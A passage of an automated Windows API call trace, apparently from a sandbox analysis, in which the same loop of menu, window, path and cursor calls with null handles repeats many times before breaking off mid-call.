[0176.308] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.308] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.308] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.308] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.308] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.308] GetStockObject (i=6) returned 0x1b00018 [0176.308] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.308] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.308] PathFileExistsW (pszPath=0x0) returned 0 [0176.308] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.308] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.308] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.308] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.308] GetMenu (hWnd=0x0) returned 0x0 [0176.308] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.308] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.308] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.308] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.308] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.308] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.308] GetStockObject (i=6) returned 0x1b00018 [0176.308] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.308] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.308] PathFileExistsW (pszPath=0x0) returned 0 [0176.308] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.308] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.308] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.309] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.309] GetMenu (hWnd=0x0) returned 0x0 [0176.309] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x354) returned -1 [0176.309] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.309] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.309] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.309] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.309] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.309] GetStockObject (i=6) returned 0x1b00018 [0176.309] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.309] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.309] PathFileExistsW (pszPath=0x0) returned 0 [0176.309] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.309] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.309] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.309] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.309] GetMenu (hWnd=0x0) returned 0x0 [0176.309] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x20b) returned -1 [0176.309] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.309] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.309] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.309] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.309] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.309] GetStockObject (i=6) returned 0x1b00018 [0176.309] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.309] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.309] PathFileExistsW (pszPath=0x0) returned 0 [0176.309] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.309] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.309] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.309] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.309] GetMenu (hWnd=0x0) returned 0x0 [0176.309] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.309] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.309] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.310] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.310] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.310] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.310] GetStockObject (i=6) returned 0x1b00018 [0176.310] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.310] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.310] PathFileExistsW (pszPath=0x0) returned 0 [0176.310] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.310] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.310] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.310] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.310] GetMenu (hWnd=0x0) returned 0x0 [0176.310] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x350) returned -1 [0176.310] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.310] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.310] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.310] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.310] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.310] GetStockObject (i=6) returned 0x1b00018 [0176.310] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.310] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.310] PathFileExistsW (pszPath=0x0) returned 0 [0176.310] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.310] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.310] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.310] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.310] GetMenu (hWnd=0x0) returned 0x0 [0176.310] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.310] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.310] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.310] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.310] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.311] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.311] GetStockObject (i=6) returned 0x1b00018 [0176.311] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.311] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.311] PathFileExistsW (pszPath=0x0) returned 0 [0176.311] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.311] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.311] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.311] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.311] GetMenu (hWnd=0x0) returned 0x0 [0176.311] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x353) returned -1 [0176.311] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.311] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.311] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.311] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.311] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.311] GetStockObject (i=6) returned 0x1b00018 [0176.311] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.311] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.311] PathFileExistsW (pszPath=0x0) returned 0 [0176.311] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.311] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.311] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.311] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.311] GetMenu (hWnd=0x0) returned 0x0 [0176.311] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0xc) returned -1 [0176.311] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.311] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.311] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.311] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.311] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.311] GetStockObject (i=6) returned 0x1b00018 [0176.311] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.312] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.312] PathFileExistsW (pszPath=0x0) returned 0 [0176.312] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.312] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.312] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.312] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.312] GetMenu (hWnd=0x0) returned 0x0 [0176.312] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.312] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.312] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.312] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.312] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.312] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.312] GetStockObject (i=6) returned 0x1b00018 [0176.312] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.312] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.312] PathFileExistsW (pszPath=0x0) returned 0 [0176.312] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.312] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.312] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.312] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.312] GetMenu (hWnd=0x0) returned 0x0 [0176.312] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x34f) returned -1 [0176.312] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.312] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.312] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.312] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.312] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.312] GetStockObject (i=6) returned 0x1b00018 [0176.312] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.312] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.312] PathFileExistsW (pszPath=0x0) returned 0 [0176.312] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.312] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.313] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.313] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.313] GetMenu (hWnd=0x0) returned 0x0 [0176.313] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.313] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.313] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.313] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.313] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.313] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.313] GetStockObject (i=6) returned 0x1b00018 [0176.313] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.313] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.313] PathFileExistsW (pszPath=0x0) returned 0 [0176.313] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.313] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.313] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.313] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.313] GetMenu (hWnd=0x0) returned 0x0 [0176.313] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x354) returned -1 [0176.313] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.313] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.313] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.313] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.313] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.313] GetStockObject (i=6) returned 0x1b00018 [0176.313] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.313] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.313] PathFileExistsW (pszPath=0x0) returned 0 [0176.313] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.313] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.313] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.313] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.313] GetMenu (hWnd=0x0) returned 0x0 [0176.313] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x4d2) returned -1 [0176.313] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.314] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.314] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.314] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.314] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.314] GetStockObject (i=6) returned 0x1b00018 [0176.314] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.314] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.314] PathFileExistsW (pszPath=0x0) returned 0 [0176.314] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.314] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.314] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.314] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.314] GetMenu (hWnd=0x0) returned 0x0 [0176.314] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.314] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.314] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.314] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.314] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.314] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.314] GetStockObject (i=6) returned 0x1b00018 [0176.314] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.314] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.314] PathFileExistsW (pszPath=0x0) returned 0 [0176.314] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.314] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.314] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.314] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.314] GetMenu (hWnd=0x0) returned 0x0 [0176.314] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x350) returned -1 [0176.314] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.314] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.314] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.314] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.314] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.315] GetStockObject (i=6) returned 0x1b00018 [0176.315] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.315] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.315] PathFileExistsW (pszPath=0x0) returned 0 [0176.315] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.315] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.315] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.315] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.315] GetMenu (hWnd=0x0) returned 0x0 [0176.315] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.315] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.315] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.315] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.315] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.315] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.315] GetStockObject (i=6) returned 0x1b00018 [0176.315] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.315] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.315] PathFileExistsW (pszPath=0x0) returned 0 [0176.315] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.315] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.315] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.315] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.315] GetMenu (hWnd=0x0) returned 0x0 [0176.315] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x354) returned -1 [0176.315] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.315] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.315] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.315] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.315] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.315] GetStockObject (i=6) returned 0x1b00018 [0176.315] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.315] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.315] PathFileExistsW (pszPath=0x0) returned 0 [0176.315] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.316] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.316] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.316] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.316] GetMenu (hWnd=0x0) returned 0x0 [0176.316] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x4aa) returned -1 [0176.316] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.316] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.316] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.316] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.316] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.316] GetStockObject (i=6) returned 0x1b00018 [0176.316] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.316] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.316] PathFileExistsW (pszPath=0x0) returned 0 [0176.316] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.316] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.316] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.316] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.316] GetMenu (hWnd=0x0) returned 0x0 [0176.316] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.316] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.316] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.316] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.316] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.316] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.316] GetStockObject (i=6) returned 0x1b00018 [0176.316] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.316] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.316] PathFileExistsW (pszPath=0x0) returned 0 [0176.316] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.316] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.316] FindWindowA (lpClassName="pad", 